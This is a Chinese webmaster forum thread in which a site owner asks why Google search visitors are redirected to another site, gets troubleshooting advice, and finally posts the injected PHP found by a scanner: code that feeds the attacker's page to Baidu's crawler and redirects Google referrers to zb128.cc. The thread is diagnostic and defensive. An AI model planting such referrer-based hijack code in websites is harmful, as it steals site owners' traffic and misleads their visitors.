谷歌搜索结果被劫持了，怎么解决呢？

妃子笑 · 发表于 2017-11-25 16:59:07

大家好，好久不见啦 @！

我遇到一个很奇怪的问题，我的网站 www.mg21.com

在谷歌的搜索结果全部被劫持到另外一个网站去，比如我 site:www.mg21.com 找到自己的网站，点进去以后，会被劫持到另外一个网站 zb128.cc

而百度和bing等的搜索结果就不会劫持，直接访问也OK，其他地方的外链进来也OK，只有谷歌的流量进不来。

我想着加个SSL，可是弄半天也没弄好，有点尴尬。

有没有遇到这个情况的？给个解决思路啊！谢谢啦！

晕蛋疯亲 · 发表于 2017-11-25 17:07:47

明显被黑了，查下是不是被挂JS了

妃子笑 · 发表于 2017-11-25 17:11:27

晕蛋疯亲发表于 2017-11-25 17:07
6 s& H* s5 S4 \* ^& w8 ?, l明显被黑了，查下是不是被挂JS了

我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

晕蛋疯亲 · 发表于 2017-11-25 17:20:03

妃子笑发表于 2017-11-25 17:11
/ b0 S2 M# A( @我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改过，那就只能自己手动慢慢查了，文件多挺累人的

妃子笑 · 发表于 2017-11-25 18:08:48

晕蛋疯亲发表于 2017-11-25 17:20
' J! U% r* W% Q% K5 x+ w加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改 ...

应该不是js吧，我把所有的JS文件全部删除了，重新从wp官方下载了，再上传，还是一样呢？

ceom123 · 发表于 2017-11-25 18:10:42

我这不会啊。我用谷歌搜索了再点进去。正常显示，没有跳转。

妃子笑 · 发表于 2017-11-25 18:26:22

ceom123 发表于 2017-11-25 18:10
- H( t8 y2 _0 l) l' X+ E4 q3 r我这不会啊。我用谷歌搜索了再点进去。正常显示，没有跳转。

你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？

那如果这样的话，是我的电脑DNS被劫持了吗？

小白龙 · 发表于 2017-11-25 19:03:45

荔枝姐好

1198345 · 发表于 2017-11-25 19:17:52

使用D盾查一下

qiqinjun · 发表于 2017-11-25 19:40:43

这个应该是加了代码进去，一般是三个地方，第一个是网页的源代码里面，直接右键查看源代码就可以看到，第二个是程序里面加判断跳转代码，如果程序简单的话，也好找出来，第三个应该就是.htaccess文件，判断谷歌来路，然后跳转，一眼就可以看出来，你去找找这三个地方试试

wxmd · 发表于 2017-11-25 20:18:19

荔枝现在做啥了，还搞主机AFF吗？

c21xdx · 发表于 2017-11-25 20:48:38

按照10楼大佬说的来。可以把网站文件都下载到你本地的电脑上，用9楼说的 D盾来扫描你的所有网站文件，看看有没有什么可疑代码，360什么的没用的，这只是别人偷偷在你的网站空间里偷偷添加了一个跳转文件或者就直接在你原本的某个网站文件里直接添加了一些代码用来判断来路，如果来路是谷歌搜索来的，就进行跳转到其它网站，其它来路或者没有来路（就是直接出入域名打开）就不进行跳转。如果D盾有提示出什么可疑代码，可以把那一段贴到论坛来，这里很多程序大牛可以帮你看看的。如果没提示找到什么可疑代码，你觉得合适的可以贴出来的话，如果你的网站空间是用apache的话，在网站根目录下找到10楼大佬说的.htaccess贴出来看看，如果是nginx的话，就找到vhost下的域名配置文件，如果你的网站是在VPS上的。

沐风 · 发表于 2017-11-25 21:18:25

中国移动，四川成都。
网页被跳转了……
估计不像是运营商干的，也不是DNS污染或劫持。
而是你的网站，确实被加了JS代码。
这和我的Cloak做的跳转一样……

查一下你的网页代码吧，很可能是被加到了主题文件中。

ceom123 · 发表于 2017-11-26 01:44:33

妃子笑发表于 2017-11-25 18:26( R. R6 m* G4 y, z3 P
你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？+ ?; [) M G* q
# n) a9 z6 l" n6 e5 _& q9 S6 O
那如果这样的话，是我的电脑DNS被劫持了 ...

是的，我用site: 搜索你的网站，然后点击其中的一个结果。正常跳转。

妃子笑 · 发表于 2017-11-26 04:22:32

谢谢大家，用D盾查到问题了，被挂了一段代码：

<?php
if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {
$file = file_get_contents('http://www。zb128。cc');
echo $file;//
exit;
}
if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {
Header("Location: http://www。zb128。cc");//
exit;
}

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	⚡️最干净<Wifi住宅+5G移动>IP代理	泰国仓储，本土仓发货2-3元/单
指纹浏览器，就用AdsPower	谷歌/FB/Bing/Yahoo代理商开户	7200W全球动态不重复住宅IP代理	全球优质流量，选TrafficStars
出售Facebook,友缘号,FB广告号,ins	FB/TT/KW 加白开户	ADPLEXITY + ADVERTCN	比Adplexity还好用的Spy工具
广	告	开	户
FB/Google/TK	海外多媒体	极速	下户
BINOM TRACKER 60% OFF!	MediaGo+Taboola+Ob开户	百度国际MediaGo⚡️让产品狂奔全球	百度国际，高点击转化，快速放量
百度国际MediaGo，独家原生流量	虚拟信用卡+独立站收款	行业首创新型指纹Cloak, 谷歌奇效!	Kookeey⚡️100%独享⚡️原生住宅IP
⚡IPFoxy住宅代理全场88折⚡	全球虚拟卡, 支持U充值	免账户投放 FB 广告（送项目）	2024做什么 - Media buy 项目库
免费黑五教程（持续更新、欢迎交流）	Facebook 批量上广告	Bridgeway - 联盟营销网络	IPCola 全新住宅代理 ⚡️ 免费试用
各种主页、账单户、BM户（优势）	⚡️个人户，bm户不限额，账单户	Adsterra 的CPA/CPM/CPC 网站流量	在线注册美国/英国/香港等海外公司
EU KETO/CBD - Jumbleberry	FB二三解1元/个	9Proxy ⚡️ $0.04/IP, 无限带宽	cloak斗篷/ss/nutra/cpa/Dating
E.PN 虚拟卡	Asocks代理服务器$3/GB	高薪诚求实力FB投手（独立站）	《全新虚拟卡+全球收付款》
广告位出租	全球低价纯净住宅/移动IP-免费试用	广告代投, 东南亚物流, 虚拟信用卡	VMLogin指纹浏览器+多账号防关联

[讨论] 谷歌搜索结果被劫持了，怎么解决呢？

点评

点评

点评

评分

点评

点评

点评

评分

评分

点评

评分

本帖子中包含更多资源

评分

评分

社区QQ达人